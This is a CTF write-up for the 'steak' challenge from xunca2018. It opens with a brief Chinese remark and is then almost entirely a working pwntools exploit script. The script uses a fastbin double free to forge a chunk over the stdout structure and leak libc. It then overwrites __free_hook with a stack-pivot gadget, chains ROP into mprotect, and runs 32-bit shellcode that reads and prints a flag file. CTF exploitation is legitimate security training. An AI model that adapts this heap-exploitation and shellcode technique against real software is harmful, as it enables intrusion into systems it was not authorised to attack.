xunca2018

Note

找状态的一题,也学到很多新东西,善。

the way

the exp

from pwn_debug import *

#context.log_level = 'debug'

# Wrap the target binary with pwn_debug; the '2.23' argument presumably selects
# the glibc version to run it against (verify against the pwn_debug API).
ins = pwn_debug('./steak')
ins.debug('2.23')

# Process handle shared by every helper below (module-level global `p`).
# Hard-coded addresses later in the script only hold for this 'debug' run's
# layout — TODO confirm how pwn_debug configures the process.
p = ins.run('debug')

def add(size,content):
    """Drive menu option 1 (add): answer the prompts with *size* and *content*.

    Each prompt is awaited with p.recvuntil and answered with p.sendline,
    so *content* always goes out with a trailing newline.
    """
    dialogue = (
        ('>', '1'),
        ('size:', str(size)),
        ('buf:', content),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)

def delete(index):
    """Drive menu option 2 (delete) for slot *index*.

    Waits for the menu prompt and the 'index:' prompt in turn, answering
    each with p.sendline.
    """
    dialogue = (
        ('>', '2'),
        ('index:', str(index)),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)

def edit(index,size,content,no):
    """Drive menu option 3 (edit) on slot *index*.

    *size* is sent as the new length; *content* is then delivered with
    p.send (no trailing newline) when *no* is truthy, otherwise with
    p.sendline.
    """
    dialogue = (
        ('>', '3'),
        ('index:', str(index)),
        ('size:', str(size)),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil('buf:')
    # Raw send keeps payload bytes exact; sendline appends '\n'.
    deliver = p.send if no else p.sendline
    deliver(content)

def copy(src,dst,length):
    """Drive menu option 4 (copy) from slot *src* to slot *dst* for *length* bytes.

    NOTE(review): the destination prompt is matched as 'index' without the
    colon, unlike the source prompt — presumably deliberate; verify against
    the binary's actual output.
    """
    dialogue = (
        ('>', '4'),
        ('index:', str(src)),
        ('index', str(dst)),
        ('length:', str(length)),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)

# Exploit sequence (Python 2: raw_input and str-based byte concatenation).
# Every address in this section is a hard-coded literal tied to the 'debug'
# run's layout; only libc_adr is computed at runtime, from the leak read
# after the fake_stdout edit below. The trailing "#N" comments are the
# author's running tally of allocation indices — presumably the slot
# numbers the menu assigns; verify against the program's output.
add(0x60,'AAAA')#0
add(0x60,'BBBB')#1
delete(0)
delete(1)
delete(0)
add(0xf0,'CCCC')#2
add(0x10,'i am solider')#3
delete(2)
add(0x60,'AAAA')#4
add(0x60,'BBBB')#5
copy(2,4,8)
#raw_input('stop')
# no=1 -> p.send, so exactly the 2 bytes go out with no newline appended;
# str() is a no-op on a Python 2 str literal.
edit(4,2,str("\xdd\x55"),1)
add(0x60,'dfff')#6
#stdout_flag_adr 0x7ffff7dd5620
#stdout_io_write_base 0x7ffff7dd5638
#fake_fastbin_chunk 0x7ffff7dd55e5-0x8 0x70
add(0x60,'got_stdout');#7  (trailing ';' is harmless)

# Padding length is the difference between the two commented addresses above;
# 0xfbad1800 is packed little-endian 64-bit (p64), followed by 0x19 NUL bytes.
fake_stdout = "\x00"*(0x7ffff7dd5620-0x7ffff7dd55ed)+p64(0xfbad1800)+"\x00"*0x19
#raw_input('stop')
edit(7,len(fake_stdout),fake_stdout,1)
# 0x39c600
# Takes 6 bytes at offset 65 of everything received up to 'copy', NUL-pads to
# 8 and unpacks with u64. The offset 65 depends on the program's menu text —
# re-check it if the banner or prompts differ.
leak_adr = u64(p.recvuntil('copy')[65:65+6].ljust(8,'\x00'))
# 0x39c600 is the author's constant from the comment above; the result is the
# only runtime-derived value used later (rop below adds 0x17f6f4 to it).
libc_adr = leak_adr-0x39c600
p.info('[*] libc addr {}'.format(hex(libc_adr)))
#p.info('[*] test {}'.format(p.recvuntil('\x0a>')))

#one_gadget 0x3f43a
#free_hook 0x7ffff7dd67a8
# Assigned but not referenced anywhere below in this script.
one_gadget = 0x3f43a
delete(0)
#bss_fake_fast_chunk
edit(0,8,p64(0x60218d),1)
add(0x60,'AAAA')#8
#got bss
add(0x60,'f')#9
change_bss_arr = "\x00"*3+p64(0x7ffff7dd67a8)
edit(9,len(change_bss_arr),change_bss_arr,1)
#change free_hook
#0x000000000015a6b8 : xchg eax, edi ; xchg eax, esp ; ret
#thats fking amazing free_hook with that gadget can do anything,no need leak heap adr or stack adr
edit(0,8,p64(0x7ffff7b936b8),1)

#mprotect
#0x7ffff7a3aebb: retf

# The assembly string below is assembled as i386; context.bits is switched
# back to 64 right after asm() so the later p64() calls are unaffected.
context.bits=32

#print shellcraft.i386.linux.open('./flag')
# open -> read ->write
s = '''
push 0x1010101
xor dword ptr [esp], 0x1016660
push 0x6c662f2e
mov ebx, esp
xor ecx, ecx
xor edx, edx
mov eax,5
int 0x80
mov ebx, eax
mov eax,3
mov ecx, 0x602900
mov edx,0x50
int 0x80
mov eax,4
mov ebx, 1
mov ecx, 0x602900
mov edx,0x50
int 0x80
'''
change_bss_arr2shellcode=asm(s)

context.bits=64

#where put shellcode
# The same payload is built twice here (once for len(), once to send);
# a local variable would avoid the duplication.
edit(9,len("\x00"*3+p64(0x602500)),"\x00"*3+p64(0x602500),1)
edit(0,len(change_bss_arr2shellcode),change_bss_arr2shellcode,1)
#rop
#0x0000000000400ca3 : pop rdi ; ret
#0x0000000000400ca1 : pop rsi ; pop r15 ; ret
#0x7ffff7b34b54 pop rdx ; pop rbx ; ret
#0x7ffff7b1f65a pop rax ; ret
#mov rdi,m_addr
#mov rsi,0x1000
#mov rdx,7 #read_write_exec
#mov eax, 0Ah
#syscall
# Chain of p64() values: the commented gadget addresses above, one
# libc-relative entry (0x17f6f4 + libc_adr), then 0x602500 (where the
# shellcode was written two edits above) and 0x23.
rop = p64(0x400ca3)+p64(0x602000)+p64(0x400ca1)+p64(0x1000)*2+p64(0x7ffff7b34b54)+p64(7)+p64(0)+p64(0x00007ffff7b1c5f0)+p64(0x17f6f4+libc_adr)+p64(0x602500)+p64(0x23)

edit(2,len(rop),rop,1)
# Python 2 raw_input: blocks until Enter — presumably to attach a debugger
# before the final delete() below.
raw_input('stop')
delete(2)
p.interactive()